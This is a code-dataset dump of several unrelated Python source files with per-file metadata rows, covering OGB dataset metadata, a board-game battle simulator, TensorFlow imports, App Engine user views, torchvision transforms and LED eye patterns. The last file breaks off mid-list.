dataset_dict[name]["url"] = "https://snap.stanford.edu/ogb/data/nodeproppred/"+dataset_dict[name]["download_name"]+".zip"
dataset_dict[name]["add_inverse_edge"] = False
dataset_dict[name]["has_node_attr"] = True
dataset_dict[name]["has_edge_attr"] = False
dataset_dict[name]["split"] = "time"
dataset_dict[name]["additional node files"] = 'node_year'
dataset_dict[name]['additional edge files'] = 'None'
dataset_dict[name]['is hetero'] = False
### add meta-information about paper venue prediction task
name = "ogbn-mag"
dataset_dict[name] = {"num tasks": 1, "num classes": 349, "eval metric": "acc", "task type": "multiclass classification"}
dataset_dict[name]["download_name"] = "mag"
dataset_dict[name]["version"] = 2
dataset_dict[name]["url"] = "https://snap.stanford.edu/ogb/data/nodeproppred/"+dataset_dict[name]["download_name"]+".zip"
dataset_dict[name]["add_inverse_edge"] = False
dataset_dict[name]["has_node_attr"] = True
dataset_dict[name]["has_edge_attr"] = False
dataset_dict[name]["split"] = "time"
dataset_dict[name]["additional node files"] = 'node_year'
dataset_dict[name]['additional edge files'] = 'edge_reltype'
dataset_dict[name]['is hetero'] = True
### add meta-information about paper category prediction in huge paper citation network
name = "ogbn-papers100M"
dataset_dict[name] = {"num tasks": 1, "num classes": 172, "eval metric": "acc", "task type": "multiclass classification"}
dataset_dict[name]["download_name"] = "papers100M"
dataset_dict[name]["version"] = 1
dataset_dict[name]["url"] = "https://snap.stanford.edu/ogb/data/nodeproppred/"+dataset_dict[name]["download_name"]+".zip"
dataset_dict[name]["add_inverse_edge"] = False
dataset_dict[name]["has_node_attr"] = True
dataset_dict[name]["has_edge_attr"] = False
dataset_dict[name]["split"] = "time"
dataset_dict[name]["additional node files"] = 'node_year'
dataset_dict[name]['additional edge files'] = 'None'
dataset_dict[name]['is hetero'] = False
df = pd.DataFrame(dataset_dict)
# saving the dataframe
df.to_csv("master.csv")
| 51.426829
| 131
| 0.741048
| 592
| 4,217
| 5.094595
| 0.180743
| 0.226127
| 0.298408
| 0.07626
| 0.829576
| 0.769562
| 0.724801
| 0.724801
| 0.679708
| 0.679708
| 0
| 0.007592
| 0.094143
| 4,217
| 82
| 132
| 51.426829
| 0.781937
| 0.165521
| 0
| 0.553846
| 0
| 0
| 0.421821
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.015385
| 0
| 0.015385
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c487fa3b1598de60dbf07c0af4f1a9d2b9b39be8
| 41
|
py
|
Python
|
installer/whimbrel/install/util/__init__.py
|
groboclown/whimbrel
|
1968cccf4888ef893686a812ed729205a31d2a12
|
[
"Apache-2.0"
] | null | null | null |
installer/whimbrel/install/util/__init__.py
|
groboclown/whimbrel
|
1968cccf4888ef893686a812ed729205a31d2a12
|
[
"Apache-2.0"
] | null | null | null |
installer/whimbrel/install/util/__init__.py
|
groboclown/whimbrel
|
1968cccf4888ef893686a812ed729205a31d2a12
|
[
"Apache-2.0"
] | null | null | null |
from . import out
from . import copy
| 10.25
| 19
| 0.658537
| 6
| 41
| 4.5
| 0.666667
| 0.740741
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.292683
| 41
| 3
| 20
| 13.666667
| 0.931034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
673402bc79b48f0a831cef4d914b3b7e9e8743b0
| 4,093
|
py
|
Python
|
app/calculator/assign.py
|
EBaalhuis/TI4_battle_sim
|
c139ca71d98f320f780cbfc6297d5d1d1ad08a0b
|
[
"MIT"
] | 3
|
2021-05-12T20:32:06.000Z
|
2022-02-25T21:29:23.000Z
|
app/calculator/assign.py
|
EBaalhuis/TI4_battle_sim
|
c139ca71d98f320f780cbfc6297d5d1d1ad08a0b
|
[
"MIT"
] | 109
|
2021-01-10T11:09:11.000Z
|
2021-03-25T20:33:13.000Z
|
app/calculator/assign.py
|
EBaalhuis/TI4_battle_sim
|
c139ca71d98f320f780cbfc6297d5d1d1ad08a0b
|
[
"MIT"
] | 1
|
2021-03-25T00:49:12.000Z
|
2021-03-25T00:49:12.000Z
|
import app.calculator.faction_abilities as faction_abilities
def assign_hits(units, hits, risk_direct_hit, faction, options, attacker):
if hits <= 0:
return units, options
# Shields Holding
if options["att_shields_active"] and attacker:
options["att_shields_active"] = False
hits -= 2
if options["def_shields_active"] and not attacker:
options["def_shields_active"] = False
hits -= 2
# Letnev flagship (sustain)
if faction == "Letnev":
units, hits = faction_abilities.letnev_flagship_sustain(units, hits, risk_direct_hit)
for u in units:
if hits <= 0:
return units, options
hits -= u.use_sustain(risk_direct_hit)
while hits > 0 and units:
if units[0].sustain:
hits -= units[0].use_sustain(risk_direct_hit=True)  # sustain on the ship being checked, not the loop variable left over from above
# Once one ship sustains and is not Direct Hit, assume it's safe
return assign_hits(units, hits, True, faction, options, attacker)
else:
# Check if only PDS are left
if units[0].name == "pds" and not units[0].ground: # second part rules out Titans PDS
return units, options
# Yin agent
if (options["att_yin_agent_active"] and attacker) or (options["def_yin_agent_active"] and not attacker) \
and units[0].name in ["destroyer", "cruiser"]:
units, options = faction_abilities.yin_agent(units, units[0], faction, options, attacker)
else:
del units[0]
hits -= 1
return units, options
def assign_fighters_only(units, hits, options, attacker):
if hits <= 0:
return units, options
# Shields Holding
if options["att_shields_active"] and attacker:
options["att_shields_active"] = False
hits -= 2
if options["def_shields_active"] and not attacker:
options["def_shields_active"] = False
hits -= 2
result = [u for u in units]
for u in units:
if hits <= 0:
return result, options
if u.fighter or u.name == "virtual":
result.remove(u)
hits -= 1
return result, options
def assign_nonfighters_first(units, hits, risk_direct_hit, faction, options, attacker):
if hits <= 0:
return units, options
# Shields Holding
if options["att_shields_active"] and attacker:
options["att_shields_active"] = False
hits -= 2
if options["def_shields_active"] and not attacker:
options["def_shields_active"] = False
hits -= 2
# Letnev flagship (sustain)
if faction == "Letnev":
units, hits = faction_abilities.letnev_flagship_sustain(units, hits, risk_direct_hit)
for u in units:
if hits <= 0:
return units, options
hits -= u.use_sustain(risk_direct_hit)
fighters = list(filter(lambda x: x.name == "fighter", units))
non_fighters = list(filter(lambda x: x.name != "fighter", units))
for u in non_fighters:
if hits <= 0:
return units, options
if u.name == "pds" and not u.ground: # second part rules out Titans PDS
break
if u.sustain:
hits -= u.use_sustain(risk_direct_hit=True)
# Once one ship sustains and is not Direct Hit, assume it's safe
return assign_nonfighters_first(units, hits, True, faction, options, attacker)
else:
# Yin agent
if (options["att_yin_agent_active"] and attacker) or (options["def_yin_agent_active"] and not attacker) \
and units[0].name in ["destroyer", "cruiser"]:
units, options = faction_abilities.yin_agent(units, u, faction, options, attacker)
else:
units.remove(u)
hits -= 1
for u in fighters:
if hits <= 0:
return units, options
if u.name == "pds" and not u.ground: # second part rules out Titans PDS
return units, options
units.remove(u)
hits -= 1
return units, options
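# --- Hedged usage sketch (not part of the original module) ---
# A hypothetical minimal stand-in for the project's unit objects, assuming only
# the attributes the functions above actually read (name, sustain, fighter,
# ground, use_sustain). The real project defines richer unit classes elsewhere.
class _StubUnit:
    def __init__(self, name, sustain=False, fighter=False, ground=False):
        self.name = name
        self.sustain = sustain
        self.fighter = fighter
        self.ground = ground

    def use_sustain(self, risk_direct_hit):
        # Absorb one hit by sustaining damage, once.
        if self.sustain:
            self.sustain = False
            return 1
        return 0

# The option keys mirror the ones read by assign_hits above; the faction is a placeholder.
_options = {"att_shields_active": False, "def_shields_active": False,
            "att_yin_agent_active": False, "def_yin_agent_active": False}
_fleet = [_StubUnit("dreadnought", sustain=True), _StubUnit("fighter", fighter=True)]
_fleet, _options = assign_hits(_fleet, 2, risk_direct_hit=True, faction="Sol",
                               options=_options, attacker=True)
# Expected: the dreadnought sustains the first hit and is destroyed by the second,
# leaving only the fighter in the fleet.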
| 33.826446
| 117
| 0.602981
| 519
| 4,093
| 4.60501
| 0.146435
| 0.065272
| 0.082845
| 0.043515
| 0.855649
| 0.800837
| 0.800837
| 0.768201
| 0.758159
| 0.723013
| 0
| 0.009145
| 0.305399
| 4,093
| 120
| 118
| 34.108333
| 0.831516
| 0.090154
| 0
| 0.758621
| 0
| 0
| 0.09973
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034483
| false
| 0
| 0.011494
| 0
| 0.218391
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
67ad0b685e1569fd4450b8b9b3b6af12b4d3d79b
| 182
|
py
|
Python
|
order_routing/base_trader.py
|
qplum/trade-analysis
|
c2a641ea0f49da4b29098b33a3b7cbeedfc2b866
|
[
"MIT"
] | 32
|
2016-07-01T13:16:39.000Z
|
2021-08-17T16:18:59.000Z
|
order_routing/base_trader.py
|
VCGJake/trade-analysis
|
c2a641ea0f49da4b29098b33a3b7cbeedfc2b866
|
[
"MIT"
] | 2
|
2016-06-30T14:37:21.000Z
|
2017-09-13T16:19:23.000Z
|
order_routing/base_trader.py
|
VCGJake/trade-analysis
|
c2a641ea0f49da4b29098b33a3b7cbeedfc2b866
|
[
"MIT"
] | 18
|
2016-06-30T14:14:44.000Z
|
2018-10-13T05:13:17.000Z
|
class BaseTrader( object ):
def __init__( self, uid ):
self.uid = uid
def send_order( self, order ):
pass
def cancel_order( self, order ):
pass
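# --- Hedged usage sketch (not part of the original module) ---
# A hypothetical subclass showing how the base trader is meant to be specialised;
# PrintTrader and the dict-shaped order are assumptions made for illustration only.
class PrintTrader(BaseTrader):
    def send_order(self, order):
        print("trader %s sending order: %s" % (self.uid, order))

    def cancel_order(self, order):
        print("trader %s cancelling order: %s" % (self.uid, order))

trader = PrintTrader(uid=1)
trader.send_order({"symbol": "ES", "qty": 1, "side": "buy"})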
| 18.2
| 36
| 0.565934
| 22
| 182
| 4.409091
| 0.5
| 0.14433
| 0.28866
| 0.371134
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.340659
| 182
| 9
| 37
| 20.222222
| 0.808333
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0.285714
| 0
| 0
| 0.571429
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
db0ae63a5c6024f656a02f59efedfe6e4afa7536
| 1,323
|
py
|
Python
|
Keras_tensorflow_nightly/source2.7/tensorflow/tools/api/generator/api/feature_column/__init__.py
|
Con-Mi/lambda-packs
|
b23a8464abdd88050b83310e1d0e99c54dac28ab
|
[
"MIT"
] | 3
|
2019-04-01T11:03:04.000Z
|
2019-12-31T02:17:15.000Z
|
Keras_tensorflow_nightly/source2.7/tensorflow/tools/api/generator/api/feature_column/__init__.py
|
Con-Mi/lambda-packs
|
b23a8464abdd88050b83310e1d0e99c54dac28ab
|
[
"MIT"
] | 1
|
2021-04-15T18:46:45.000Z
|
2021-04-15T18:46:45.000Z
|
Keras_tensorflow_nightly/source2.7/tensorflow/tools/api/generator/api/feature_column/__init__.py
|
Con-Mi/lambda-packs
|
b23a8464abdd88050b83310e1d0e99c54dac28ab
|
[
"MIT"
] | 1
|
2021-09-23T13:43:07.000Z
|
2021-09-23T13:43:07.000Z
|
"""Imports for Python API.
This file is MACHINE GENERATED! Do not edit.
Generated by: tensorflow/tools/api/generator/create_python_api.py script.
"""
from tensorflow.python.feature_column.feature_column import bucketized_column
from tensorflow.python.feature_column.feature_column import categorical_column_with_hash_bucket
from tensorflow.python.feature_column.feature_column import categorical_column_with_identity
from tensorflow.python.feature_column.feature_column import categorical_column_with_vocabulary_file
from tensorflow.python.feature_column.feature_column import categorical_column_with_vocabulary_list
from tensorflow.python.feature_column.feature_column import crossed_column
from tensorflow.python.feature_column.feature_column import embedding_column
from tensorflow.python.feature_column.feature_column import indicator_column
from tensorflow.python.feature_column.feature_column import input_layer
from tensorflow.python.feature_column.feature_column import linear_model
from tensorflow.python.feature_column.feature_column import make_parse_example_spec
from tensorflow.python.feature_column.feature_column import numeric_column
from tensorflow.python.feature_column.feature_column import shared_embedding_columns
from tensorflow.python.feature_column.feature_column import weighted_categorical_column
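# --- Hedged usage sketch (not part of the generated module) ---
# A minimal illustration of a few of the re-exported feature columns; the column
# names ('price', 'age') and the bucket boundaries are made up for the example.
price = numeric_column('price')
age_buckets = bucketized_column(numeric_column('age'), boundaries=[18., 35., 65.])
parsing_spec = make_parse_example_spec([price, age_buckets])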
| 69.631579
| 99
| 0.900983
| 178
| 1,323
| 6.365169
| 0.258427
| 0.321271
| 0.247132
| 0.333628
| 0.760812
| 0.760812
| 0.760812
| 0.760812
| 0.485437
| 0.275375
| 0
| 0
| 0.055178
| 1,323
| 19
| 100
| 69.631579
| 0.9064
| 0.108088
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
db14806c805561d0b7c539954aa0f7ff0ee432a6
| 950
|
py
|
Python
|
app/views/users.py
|
matrufsc2/matrufsc2
|
d8a32c532281cc2a09a26444bd5b8497bc578b18
|
[
"RSA-MD"
] | 4
|
2017-07-07T19:04:07.000Z
|
2018-07-04T18:03:49.000Z
|
app/views/users.py
|
matrufsc2/matrufsc2
|
d8a32c532281cc2a09a26444bd5b8497bc578b18
|
[
"RSA-MD"
] | 6
|
2015-02-27T03:21:02.000Z
|
2019-07-30T19:58:35.000Z
|
app/views/users.py
|
matrufsc2/matrufsc2
|
d8a32c532281cc2a09a26444bd5b8497bc578b18
|
[
"RSA-MD"
] | null | null | null |
from google.appengine.api import users
from app.views.api import serialize
__author__ = 'fernando'
def get_current_user():
is_authenticated = users.get_current_user() is not None
login_url = None
logout_url = None
if is_authenticated:
logout_url = users.create_logout_url("/")
else:
login_url = users.create_login_url("/")
return serialize({
"id": "current",
"is_authenticated": is_authenticated,
"login_url": login_url,
"logout_url": logout_url
})
def get_users():
is_authenticated = users.get_current_user() is not None
login_url = None
logout_url = None
if is_authenticated:
logout_url = users.create_logout_url("/")
else:
login_url = users.create_login_url("/")
return serialize([{
"id": "current",
"is_authenticated": is_authenticated,
"login_url": login_url,
"logout_url": logout_url
}])
| 26.388889
| 59
| 0.646316
| 115
| 950
| 4.965217
| 0.234783
| 0.140105
| 0.098074
| 0.084063
| 0.816112
| 0.816112
| 0.816112
| 0.816112
| 0.816112
| 0.816112
| 0
| 0
| 0.247368
| 950
| 35
| 60
| 27.142857
| 0.798601
| 0
| 0
| 0.709677
| 0
| 0
| 0.105263
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0
| 0.064516
| 0
| 0.193548
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
db1f934b9ff999847ae575ddaead2519a110a688
| 1,167
|
py
|
Python
|
SDNet/data/transform.py
|
neolgu/Split-Detection-Network
|
7c8f75a10f56ff7b8e82d82af130780db402501b
|
[
"MIT"
] | 3
|
2021-05-26T07:55:27.000Z
|
2021-09-27T10:01:12.000Z
|
SDNet/data/transform.py
|
neolgu/Split-Detection-Network
|
7c8f75a10f56ff7b8e82d82af130780db402501b
|
[
"MIT"
] | 1
|
2021-06-13T08:24:19.000Z
|
2021-06-13T08:24:19.000Z
|
SDNet/data/transform.py
|
neolgu/Split-Detection-Network
|
7c8f75a10f56ff7b8e82d82af130780db402501b
|
[
"MIT"
] | null | null | null |
from torchvision import transforms
xception_data_transforms = {
'train': transforms.Compose([
transforms.Resize((299, 299)),
transforms.ToTensor(),
transforms.Normalize([0.5]*3, [0.5]*3)
]),
'val': transforms.Compose([
transforms.Resize((299, 299)),
transforms.ToTensor(),
transforms.Normalize([0.5] * 3, [0.5] * 3)
]),
'test': transforms.Compose([
transforms.Resize((299, 299)),
transforms.ToTensor(),
transforms.Normalize([0.5] * 3, [0.5] * 3)
]),
}
resnet18_data_transforms = {
'train': transforms.Compose([
transforms.Resize((224, 224)),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
]),
'val': transforms.Compose([
transforms.Resize((224, 224)),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
]),
'test': transforms.Compose([
transforms.Resize((224, 224)),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
]),
}
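# --- Hedged usage sketch (not part of the original module) ---
# Applying the Xception training pipeline to a single image; the file path is a
# placeholder and Pillow is assumed to be available.
from PIL import Image

img = Image.open("face_crop.png").convert("RGB")
tensor = xception_data_transforms["train"](img)  # torch.FloatTensor of shape [3, 299, 299]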
| 32.416667
| 84
| 0.574122
| 136
| 1,167
| 4.897059
| 0.191176
| 0.153153
| 0.243243
| 0.297297
| 0.929429
| 0.908408
| 0.908408
| 0.851351
| 0.851351
| 0.851351
| 0
| 0.143017
| 0.233076
| 1,167
| 36
| 85
| 32.416667
| 0.601117
| 0
| 0
| 0.857143
| 0
| 0
| 0.020548
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028571
| 0
| 0.028571
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c059a26d34d18e3b857e90ae29a3a2f1ddc7ec81
| 9,027
|
py
|
Python
|
alien/lib/emotions_library.py
|
oowais/MCP-Alien-Arduino-Code
|
8613843ee3d602fa62c2d13e411cd423ce5b7bf7
|
[
"MIT"
] | null | null | null |
alien/lib/emotions_library.py
|
oowais/MCP-Alien-Arduino-Code
|
8613843ee3d602fa62c2d13e411cd423ce5b7bf7
|
[
"MIT"
] | 36
|
2018-12-20T00:55:49.000Z
|
2019-01-28T22:39:08.000Z
|
alien/lib/emotions_library.py
|
oowais/MCP-Alien-Arduino-Code
|
8613843ee3d602fa62c2d13e411cd423ce5b7bf7
|
[
"MIT"
] | null | null | null |
BOOT = [(0, 0), (0, 1), (0, 2), (0, 3), (0, 4), (0, 5), (0, 6), (0, 7),
(1, 0), (1, 1), (1, 2), (1, 3), (1, 4), (1, 5), (1, 6), (1, 7),
(2, 0), (2, 1), (2, 2), (2, 3), (2, 4), (2, 5), (2, 6), (2, 7),
(3, 0), (3, 1), (3, 2), (3, 3), (3, 4), (3, 5), (3, 6), (3, 7),
(4, 0), (4, 1), (4, 2), (4, 3), (4, 4), (4, 5), (4, 6), (4, 7),
(5, 0), (5, 1), (5, 2), (5, 3), (5, 4), (5, 5), (5, 6), (5, 7),
(6, 0), (6, 1), (6, 2), (6, 3), (6, 4), (6, 5), (6, 6), (6, 7),
(7, 0), (7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6), (7, 7)]
LEFT_BOOT_1 = [(0, 3), (0, 4), (0, 5), (0, 6)]
LEFT_BOOT_2 = [(1, 2), (1, 7)]
LEFT_BOOT_3 = [(2, 1), (2, 4), (2, 5), (2, 7)]
LEFT_BOOT_4 = [(3, 0), (3, 4), (3, 5), (3, 7)]
LEFT_BOOT_5 = [(4, 0), (4, 7)]
LEFT_BOOT_6 = [(5, 0), (5, 7)]
LEFT_BOOT_7 = [(6, 0), (6, 7)]
LEFT_BOOT_8 = [(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
RIGHT_BOOT_1 = [(0, 1), (0, 2), (0, 3), (0, 4)]
RIGHT_BOOT_2 = [(1, 0), (1, 5)]
RIGHT_BOOT_3 = [(2, 0), (2, 3), (2, 4), (2, 6)]
RIGHT_BOOT_4 = [(3, 0), (3, 3), (3, 4), (3, 7)]
RIGHT_BOOT_5 = [(4, 0), (4, 7)]
RIGHT_BOOT_6 = [(5, 0), (5, 7)]
RIGHT_BOOT_7 = [(6, 0), (6, 7)]
RIGHT_BOOT_8 = [(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
LEFT_NORMAL = [(0, 3), (0, 4), (0, 5), (0, 6),
(1, 2), (1, 7),
(2, 1), (2, 4), (2, 5), (2, 7),
(3, 0), (3, 4), (3, 5), (3, 7),
(4, 0), (4, 7),
(5, 0), (5, 7),
(6, 0), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
RIGHT_NORMAL = [(0, 1), (0, 2), (0, 3), (0, 4),
(1, 0), (1, 5),
(2, 0), (2, 3), (2, 4), (2, 6),
(3, 0), (3, 3), (3, 4), (3, 7),
(4, 0), (4, 7),
(5, 0), (5, 7),
(6, 0), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
LEFT_NORMAL_2 = [(0, 3), (0, 4), (0, 5), (0, 6),
(1, 2), (1, 7),
(2, 1), (2, 3), (2, 4), (2, 7),
(3, 0), (3, 3), (3, 4), (3, 7),
(4, 0), (4, 7),
(5, 0), (5, 7),
(6, 0), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
RIGHT_NORMAL_2 = [(0, 1), (0, 2), (0, 3), (0, 4),
(1, 0), (1, 5),
(2, 0), (2, 2), (2, 3), (2, 6),
(3, 0), (3, 2), (3, 3), (3, 7),
(4, 0), (4, 7),
(5, 0), (5, 7),
(6, 0), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
LEFT_HAPPY = [(0, 3), (0, 4), (0, 5), (0, 6),
(1, 2), (1, 7),
(2, 1), (2, 7),
(3, 0), (3, 7),
(4, 0), (4, 3), (4, 4), (4, 7),
(5, 0), (5, 2), (5, 5), (5, 7),
(6, 0), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
RIGHT_HAPPY = [(0, 1), (0, 2), (0, 3), (0, 4),
(1, 0), (1, 5),
(2, 0), (2, 6),
(3, 0), (3, 7),
(4, 0), (4, 3), (4, 4), (4, 7),
(5, 0), (5, 2), (5, 5), (5, 7),
(6, 0), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
LEFT_HAPPY_2 = [(0, 3), (0, 4), (0, 5), (0, 6),
(1, 2), (1, 7),
(2, 1), (2, 7),
(3, 0), (3, 3), (3, 4), (3, 7),
(4, 0), (4, 2), (4, 5), (4, 7),
(5, 0), (5, 7),
(6, 0), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
RIGHT_HAPPY_2 = [(0, 1), (0, 2), (0, 3), (0, 4),
(1, 0), (1, 5),
(2, 0), (2, 6),
(3, 0), (3, 3), (3, 4), (3, 7),
(4, 0), (4, 2), (4, 5), (4, 7),
(5, 0), (5, 7),
(6, 0), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
LEFT_ANGRY = [(0, 2),
(1, 1), (1, 2), (1, 3),
(2, 1), (2, 2), (2, 3), (2, 4),
(3, 1), (3, 2), (3, 3), (3, 4), (3, 5),
(4, 1), (4, 2), (4, 3), (4, 4), (4, 5), (4, 6),
(5, 2), (5, 3), (5, 4), (5, 5), (5, 6), (5, 7),
(6, 3), (6, 4), (6, 5), (6, 6)]
RIGHT_ANGRY = [(0, 5),
(1, 4), (1, 5), (1, 6),
(2, 3), (2, 4), (2, 5), (2, 6),
(3, 2), (3, 3), (3, 4), (3, 5), (3, 6),
(4, 1), (4, 2), (4, 3), (4, 4), (4, 5), (4, 6),
(5, 0), (5, 1), (5, 2), (5, 3), (5, 4), (5, 5),
(6, 1), (6, 2), (6, 3), (6, 4)]
LEFT_ANGRY_2 = [(0, 2),
(1, 1), (1, 3),
(2, 1), (2, 4),
(3, 1), (3, 3), (3, 5),
(4, 1), (4, 3), (4, 4), (4, 6),
(5, 2), (5, 7),
(6, 3), (6, 4), (6, 5), (6, 6)]
RIGHT_ANGRY_2 = [(0, 5),
(1, 4), (1, 6),
(2, 3), (2, 6),
(3, 2), (3, 4), (3, 6),
(4, 1), (4, 3), (4, 4), (4, 6),
(5, 0), (5, 5),
(6, 1), (6, 2), (6, 3), (6, 4)]
LEFT_SLEEPY = [(1, 1), (1, 2), (1, 3), (1, 4), (1, 5), (1, 6),
(2, 2),
(3, 3),
(4, 4),
(5, 5),
(6, 1), (6, 2), (6, 3), (6, 4), (6, 5), (6, 6)]
RIGHT_SLEEPY = [(1, 1), (1, 2), (1, 3), (1, 4), (1, 5), (1, 6),
(2, 2),
(3, 3),
(4, 4),
(5, 5),
(6, 1), (6, 2), (6, 3), (6, 4), (6, 5), (6, 6)]
LEFT_SAD = [(0, 3), (0, 4), (0, 5), (0, 6),
(1, 2), (1, 7),
(2, 1), (2, 7),
(3, 0), (3, 2), (3, 3), (3, 4), (3, 5), (3, 7),
(4, 0), (4, 3), (4, 4), (4, 7),
(5, 0), (5, 3), (5, 4), (5, 7),
(6, 0), (6, 3), (6, 4), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
RIGHT_SAD = [(0, 1), (0, 2), (0, 3), (0, 4),
(1, 0), (1, 5),
(2, 0), (2, 6),
(3, 0), (3, 2), (3, 3), (3, 4), (3, 5), (3, 7),
(4, 0), (4, 3), (4, 4), (4, 7),
(5, 0), (5, 3), (5, 4), (5, 7),
(6, 0), (6, 3), (6, 4), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
LEFT_SURPRISED = [(0, 3), (0, 4), (0, 5), (0, 6),
(1, 2), (1, 7),
(2, 1), (2, 3), (2, 4), (2, 7),
(3, 0), (3, 2), (3, 5), (3, 7),
(4, 0), (4, 2), (4, 5), (4, 7),
(5, 0), (5, 3), (5, 4), (5, 7),
(6, 0), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
RIGHT_SURPRISED = [(0, 1), (0, 2), (0, 3), (0, 4),
(1, 0), (1, 5),
(2, 0), (2, 3), (2, 4), (2, 6),
(3, 0), (3, 2), (3, 5), (3, 7),
(4, 0), (4, 2), (4, 5), (4, 7),
(5, 0), (5, 3), (5, 4), (5, 7),
(6, 0), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
LEFT_SURPRISED_2 = [(0, 3), (0, 4), (0, 5), (0, 6),
(1, 2), (1, 7),
(2, 1), (2, 7),
(3, 0), (3, 3), (3, 4), (3, 7),
(4, 0), (4, 3), (4, 4), (4, 7),
(5, 0), (5, 7),
(6, 0), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
RIGHT_SURPRISED_2 = [(0, 1), (0, 2), (0, 3), (0, 4),
(1, 0), (1, 5),
(2, 0), (2, 6),
(3, 0), (3, 3), (3, 4), (3, 7),
(4, 0), (4, 3), (4, 4), (4, 7),
(5, 0), (5, 7),
(6, 0), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
LEFT_LOW_POWER = [(0, 3), (0, 4),
(1, 2), (1, 3), (1, 4), (1, 5),
(2, 2), (2, 5),
(3, 2), (3, 5),
(4, 2), (4, 5),
(5, 2), (5, 5),
(6, 2), (6, 3), (6, 4), (6, 5)]
RIGHT_LOW_POWER = [(0, 3), (0, 4),
(1, 2), (1, 3), (1, 4), (1, 5),
(2, 2), (2, 5),
(3, 2), (3, 5),
(4, 2), (4, 5),
(5, 2), (5, 3), (5, 4), (5, 5),
(6, 2), (6, 3), (6, 4), (6, 5)]
LEFT_LOW_POWER_2 = [(0, 3), (0, 4),
(1, 2), (1, 3), (1, 4), (1, 5),
(2, 2), (2, 5),
(3, 2), (3, 5),
(4, 2), (4, 5),
(5, 2), (5, 3), (5, 4), (5, 5),
(6, 2), (6, 3), (6, 4), (6, 5)]
RIGHT_LOW_POWER_2 = [(0, 3), (0, 4),
(1, 2), (1, 3), (1, 4), (1, 5),
(2, 2), (2, 5),
(3, 2), (3, 5),
